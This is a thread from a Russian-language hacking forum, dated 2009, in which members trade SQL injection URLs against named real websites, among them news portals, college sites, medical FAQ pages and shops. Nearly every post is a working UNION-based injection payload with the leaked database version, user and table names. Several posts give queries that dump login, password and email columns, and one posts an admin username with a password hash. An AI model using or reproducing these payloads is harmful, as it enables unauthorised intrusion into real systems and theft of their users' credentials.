SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Rav1n

    Rav1n Elder - Старейшина

    Joined:
    5 Nov 2008
    Messages:
    7
    Likes Received:
    21
    Reputations:
    11
    http://www.itscoldoutside.com/

    Code:
    http://www.itscoldoutside.com/news.asp?id=1+or+1=(select+top+1+id+from+dtproperties)--
    version: Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    db_name: ICONews
    system_user: Clive

    вот что удалось раскрутить:

    Code:
    table_name			column_name
    
    VW_test
    dtproperties	'id'	'objectid'	'property'	'value'	'uvalue'	'lvalue'	'version'
    NewsArticles
    sysconstraints	'constid'	'id'	'colid'	'spare1'	'status'	'actions'	'error'
    syssegments	'segment'		'name'	'status'
    t_jiaozhu		'jiaozhu'
    tbl_news
    vw_bcpMasterSysobjects	'tag'	'parent'	'Article!1!ID'	'Article!1!BradftonID'	'Article!1! Heading'		'Article!1! DateFeed'
    vw_googlenews 
    VW_rss
    VW_top
    VW_xml
    p.s. первый раз :rolleyes:
     
  2. BlackPanther

    BlackPanther New Member

    Joined:
    19 Apr 2009
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    Site: (sibmedia.ru) Новостной портал.
    SQL:
    Code:
    http://sibmedia.ru/index.php?id=-10220+union+select+CONCAT_WS(CHAR(32,58,32%20%20),user(),database(),%20version()),null,2--
    Рузелтат смотреть вверху.
    Таблицы :
    Code:
    [*]CHARACTER_SETS
    [*]COLLATION
    [*]COLLATION_CHARACTER_SET_APPLOCABILITY
    [*]COLUMNS
    [*]COLUMS_PRIVILEGES
    [*]KEY_COLUMN_USAGE
    [*]PROFILING
    [*]ROUTINES
    [*]CHEMATA
    [*]CHEMA_PRIVILEGES
    [*]STATISTICS
    [*]TABLES
    [*]TABLE_CONSTRAINTS
    [*]TABLE_PRIVILEGES
    [*]TRIGGERS
    [*]USER_PRIVILEGES
    [*]VIEWS
    [*]all_news
    [*]areas
    [*]static
    [*]vote
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.ckat.ru/keywords/answer.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version())/*
    Uwww63S@localhost:udb63:4.1.21-log
    Code:
    http://www.venereology.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9
    mgido@localhost:mgido:5.0.45
    Code:
    http://www.infomedical.ru/faq/answer.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9
    infomedical@localhost:infomedical:5.0.45
     
    #8943 mailbrush, 25 Apr 2009
    Last edited: 25 Apr 2009
  4. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://www.beadstreet.com.au/listproducts.php?id=47+union+select+concat_ws(0x3a,version(),database(),user())+limit+1,1
    version():4.1.20
    database():beadstreet
    user():beadstre@localhost
    __
    Code:
    http://www.bpsca.co.uk/products.php?id=147+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11+limit+1,1/*
    version():4.1.22-standard:
    database():bpsca_data
    user():bpsca_website@localhost
    __
    Code:
    http://www.etver.ru/1forum/viewmessage.php?sid=1&id=29140+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9
    version():5.0.77-log
    database():etver
    user():etver@localhost
     
    #8944 M.W.N.N., 25 Apr 2009
    Last edited: 26 Apr 2009
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://vikings.vcsu.edu/php/details.php?id=-563'+union+select+1,2,table_name,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+879,1000+--+

    Все таблицы заблокированны((
     
  6. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    cinema.perm.ru
    Code:
    http://cinema.perm.ru/events/?id=-67+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
    version():4.0.24_Debian-10sarge2-log
    database():dbcinema
    user():cinema@localhost
     
    1 person likes this.
  7. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<RUNAWAYBOX>>
    Code:
    http://www.runawaybox.com/video.php?vid=-396+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9--+
    Code:
    http://www.runawaybox.com/admin/
    5.0.45:runawaybox:runawaybox@localhost:portbld-freebsd6.2
    -=admin=-
    log: runawaybox
    pass: $1$0lRFi.9p$5vaDEIDcwC/b/aQu/H1.g1 ):
     
    1 person likes this.
  8. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    online game
    thx for Saint
    mssql-inj поле логина,результат в урл
    ====================================================================================

    version():4 ;(
    ====================================================================================
    concat_ws(0x3a,version(),user(),database()):5.0.67-log:[email protected]:u30200
     
    3 people like this.
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.jc.edu/calendar/details.php?id=-4265+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11+from+information_schema.tables/*
     
    #8949 DezMond™, 26 Apr 2009
    Last edited by a moderator: 26 Apr 2009
  10. Rav1n

    Rav1n Elder - Старейшина

    Joined:
    5 Nov 2008
    Messages:
    7
    Likes Received:
    21
    Reputations:
    11
    Code:
    http://www.raznosvet.com/do/notice.php?id=-7590+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10--
    version: 4.0.27-max-log
    database: razno
    user: [email protected]

    еще похекал сайт тур фирмы(mssql), пока выкладывать не буду :)
     
    #8950 Rav1n, 26 Apr 2009
    Last edited: 26 Apr 2009
    1 person likes this.
  11. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49

    www.petpsych.com

    Code:
    http://www.petpsych.com/article_detail.php?id=-1+union+select+1,2,3,4,5,6--
    version():5.0.67-community
    database():petpsych_main
    user():petpsych_petpsyc@localhost
     
    #8951 L I G A, 26 Apr 2009
    Last edited by a moderator: 26 Apr 2009
    1 person likes this.
  12. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<msong.com.ru>>
    Code:
    http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name,table_schema),3,4,5,6,7,8,9+from+information_schema.tables--+
    5.0.22:::admin_song1:::admin_song1@localhost:::redhat-linux-gnu - 3
    tables where columns: password
    Code:
    http://msong.com.ru/play.php?id=-680'+union+select+1,concat_ws(0x3a3a3a,table_name,table_schema),3,4,5,6,7,8,9+from+information_schema.columns+where+column_name+like+'password'+limit+3,1--+
     
    1 person likes this.
  13. AngelOfFaith

    AngelOfFaith Member

    Joined:
    2 Feb 2009
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    http://wap.jamango.ru/mangotop/index.php?action=top100&cat=-4+union+select+1,2,3,4,concat_ws(0x3a,url,email,password)+from+top_users/*
     
    2 people like this.
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    продолжим ломать вапики ;)

    http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(version(),0x3a, user(),0x3a,database())/*

    5.0.45-community-nt:likenetru@localhost:likenet


    акк брать из таблицы users

    http://wap.likenet.ru/wap2/showsms.php?id=1+union+select+1,2,3,concat(login,0x3a,password,0x3a,email)+from+ users/*
     
    _________________________
    #8954 HAXTA4OK, 26 Apr 2009
    Last edited: 26 Apr 2009
    1 person likes this.
  15. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://www.zbulvar.ru/wap/newz.php?newsid=21498+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+limit+1,1/*
    version():5.0.32-Debian_7etch8-log
    database():zbulvar_pm
    user():zbulvar_pm@localhost
     
    2 people like this.
  16. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.roymagazine.it/time/display.php?ID=179/**/UNION/**/SELECT/**/password,userid+from+user/*

    Database name: Sql33637_1
    User name: [email protected]
    Database Version: 4.0.30-standard-log
     
    1 person likes this.
  17. Rav1n

    Rav1n Elder - Старейшина

    Joined:
    5 Nov 2008
    Messages:
    7
    Likes Received:
    21
    Reputations:
    11
    Code:
    http://www.envapack.com/b2b/buyoffers.php?cid=-3+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+70,1#
    5.0.67-community
    envapack_b2b
    envapack_root@localhost

    таблы
    Code:
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    PROFILING
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    b2b_admin
    b2b_ads
    b2b_affiliate_banner
    b2b_banned_words
    b2b_blocked
    b2b_blocked_countries
    b2b_businesstypes
    b2b_categories
    b2b_companyprofiles
    b2b_config
    b2b_contacts
    b2b_country
    b2b_currencies
    b2b_dateformats
    b2b_employees
    b2b_fav_cats
    b2b_favorites
    b2b_feedback
    b2b_groups
    b2b_icons
    b2b_levels
    b2b_mails
    b2b_markets
    b2b_members
    b2b_messages
    b2b_news
    b2b_newsletter
    b2b_offer_cats
    b2b_offer_cats_buy
    b2b_offer_images
    b2b_offers
    b2b_offers_buy
    b2b_online
    b2b_product_cats
    b2b_product_images
    b2b_productfocus
    b2b_products
    b2b_profile_cats
    b2b_profile_markets
    b2b_search_results
    b2b_signups
    b2b_stats
    b2b_styles
    b2b_timeformats
    b2b_tmp_email
    b2b_us_states
    [B]admin[/B]
    class
    config_file
    cours
    cours_user
    course_tool
    crs_ACTIPACK_accueil
    crs_ACTIPACK_announcement
     
    #8957 Rav1n, 27 Apr 2009
    Last edited by a moderator: 27 Apr 2009
    1 person likes this.
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _http://egenius.ru/seminar/arc.php?cid=-4+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9+--

    версия:юзер:база

    5.0.67-log:[email protected]:u96975_eg
     
    _________________________
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    <<дельфинчкигги>>

    http://www.ptpi-dolphins.org/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7--

    plbginf_ptpi@localhost:plbginf_ptpi:5.0.67-community
     
    _________________________
  20. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://wap.novonews.lv/index.php?mode=news&id=72419%27+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15+limit+1,1/*
    version():5.0.22-log
    database():novonews_v2
    user():[email protected]
     
Thread Status:
Not open for further replies.